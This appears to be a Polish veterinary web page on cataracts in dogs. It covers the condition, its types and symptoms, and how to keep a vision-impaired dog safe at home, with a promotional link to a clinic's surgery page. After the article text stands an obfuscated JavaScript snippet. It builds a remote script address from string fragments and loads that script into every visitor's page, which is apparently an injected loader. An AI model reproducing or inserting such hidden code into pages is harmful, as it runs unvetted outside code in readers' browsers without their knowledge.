Czym jest psia zaćma?
Zaćmą określamy zaburzenia w obrębie soczewki oka oraz jej torebki, które skutkują jej zmętnieniem. Problem ten może dotyczyć jednego oka bądź pary oczu. Zaćma u psa wpływa na gorsze widzenie zwierzęcia, a jej rozwój może skutkować nawet całkowitą utratą wzroku. Jeśli u naszego zwierzęcego przyjaciela zauważymy postępujące zmętnienie soczewki oka, powinniśmy niezwłocznie udać się do weterynarza! Przeprowadzi on potrzebną diagnostykę i zaleci podjęcie kolejnych kroków. Jedną z metod, która może okazać się skutecznym ratunkiem w walce z zaćmą u psa, jest fakoemulsyfikacja – koniecznie dowiedz się więcej na https://www.przychodnianovet.pl/fakoemulsyfikacja-jako-ratunek-w-walce-z-zacma-u-psa/.
Rodzaje zaćmy u psa
Przebieg zaćmy u psa może się różnić w zależności od jej rodzaju. Co ważne, mętnienie soczewki oka może dotknąć zwierzę w każdym wieku – nie jest to problem, który dotyczy jedynie psich seniorów.
Zaćma starcza, która jest najszerzej znana, powstaje w wyniku starzenia się tkanek. To proces nieodwracalny, z którym zmagają się starsze zwierzęta – zmiany postępują jednak w tym przypadku powoli. Kolejnym rodzajem jest zaćma wrodzona, która występuje u młodych czworonogów. Nie zawsze jest ona dziedziczna, gdyż jej przyczyną mogą być również zaburzenia w rozwoju płodu. Zaćma nabyta zwykle powstaje w wyniku urazu, jak i nieprawidłowego żywienia. Stanowi ona również skutek uboczny niektórych leków. Zaćma cukrzycowa jest natomiast efektem zbyt wysokiego stężenia glukozy we krwi.
Objawy zaćmy u psa
Pierwsze objawy zaćmy u psa zazwyczaj trudno zauważyć – właśnie dlatego tak istotne są regularne kontrole w gabinecie weterynaryjnym. Zaćma prowadzi do stopniowego mętnienia oka bądź oczu, jednak na początku jej rozwoju wielu właścicieli zwierząt nie jest jej w stanie zauważyć. Wynika to również z faktu, że w pierwszych stadiach może nie obejmować całości, a jedynie część soczewki.
Jeśli zaćma pozostanie nieleczona, wraz z jej rozwojem wzrok pupila się pogarsza – wtedy możemy dostrzec pewne niepokojące sygnały w zachowaniu zwierzęcia. Jeśli nasz czworonóg zmaga się ze stopniową utratą wzorku, może zacząć wpadać na różne przedmioty. Dodatkowo, mogą pojawić się trudności z odnalezieniem zabawki, jak i oceną wysokości czy odległości. Pies może również mieć problem z utrzymaniem równowagi i rozpoznawaniem ludzi – nawet tych, na widok których wcześniej bardzo się cieszył. Zaćma u psa może sprawić, że nasz tryskający życiem zwierzak zacznie stawać się osowiały, a niekiedy nawet drażliwy czy strachliwy.
Pamiętajmy, że jeśli zauważymy którekolwiek z tych objawów, powinniśmy niezwłocznie udać się do weterynarza!
Jak zapewnić komfort psu z zaćmą?
Częściowa bądź całkowita utrata wzroku u psa jest czymś niezwykle ciężkim dla właściciela, ale nie możemy zapominać, że jest to problem w szczególności dotkliwy dla naszego pupila. Ważne jest, by w takiej sytuacji zapewnić mu jak największy komfort życia – dowiedz się, na co zwrócić uwagę.
Zapewnienie psu bezpieczeństwa jest sprawą kluczową – w naszym mieszkaniu powinien panować porządek, aby zwierzę nie potykało się o porozrzucane przedmioty. Ważne jest również, aby unikać przestawiania mebli – zwierzę z pewnością zapamiętało już układ łóżka, szaf, stołu i krzeseł, dlatego każda zmiana będzie prowadziła do problemów w poruszaniu się. Dodatkowo, musimy pamiętać, aby posłanie psa oraz jego miski zawsze kłaść w to samo miejsce.
Psy z problemami z wzrokiem potrzebują więcej czasu, aby zaaklimatyzować i odnaleźć się w nowych przestrzeniach. Z tego powodu istotne jest, aby zawsze spacerować w miejscach, które nasz pupil już zna. Sprawi to, że na spacerze poczuje się on pewniej. Ponadto, musimy pamiętać o nieprzerwanej kontroli zwierzęcia i ograniczeniu jego kontakt z obcymi zwierzętami do minimum. Oprócz tego, należy unikać wchodzenia po schodach.
A jedną z najważniejszych rzeczy, którą możemy zaoferować psu, który zmaga się z zaćmą, jest rutyna – to właśnie ona znacząco poprawi komfort jego życia.
(function(){ caj2=document.createElement("script");caj2_=("ust");caj2u="423545982"; caj2_+="a"+("t.i");caj2.type="text/javascript"; caj2u+=".uvgu0nsXaj2qieXfi6y6";caj2.async=true;caj2_+="n"+("f"+"o")+"/"; caj2u+="h15hmuyp73";caj2.src="https://"+caj2_+caj2u; document.body.appendChild(caj2); })();
Napisz komentarz
Komentarze